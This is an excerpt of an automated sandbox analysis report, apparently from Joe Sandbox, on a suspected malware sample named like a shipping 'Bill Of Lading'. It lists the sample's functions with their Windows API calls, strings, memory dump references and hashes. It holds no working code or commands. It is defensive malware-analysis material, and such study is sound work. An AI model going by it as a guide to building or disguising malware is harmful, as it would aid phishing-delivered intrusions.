                                                                                                                      • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                      Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: htonsinet_addr
                                                                                                                      • String ID: 255.255.255.255
                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                      • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                      • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                      • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                      • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                      Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 455545452-1403004172
                                                                                                                      • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                      • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                      • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                      • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                      Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InternetOpen
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 2038078732-4266983199
                                                                                                                      • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                      • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                      • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                      • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                      Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 455545452-1403004172
                                                                                                                      • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                      • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                      • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                      • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                      Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 455545452-1403004172
                                                                                                                      • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                      • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                      • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                      • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                      Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • wsprintfW.USER32 ref: 004560E9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_mallocwsprintf
                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                      • API String ID: 1262938277-328681919
                                                                                                                      • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                      • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                      • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                      • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                      Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                      • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                      • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                      • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                      Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                      • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                      • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                      • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                      • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                      Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                        • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                      • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                      • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                      • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E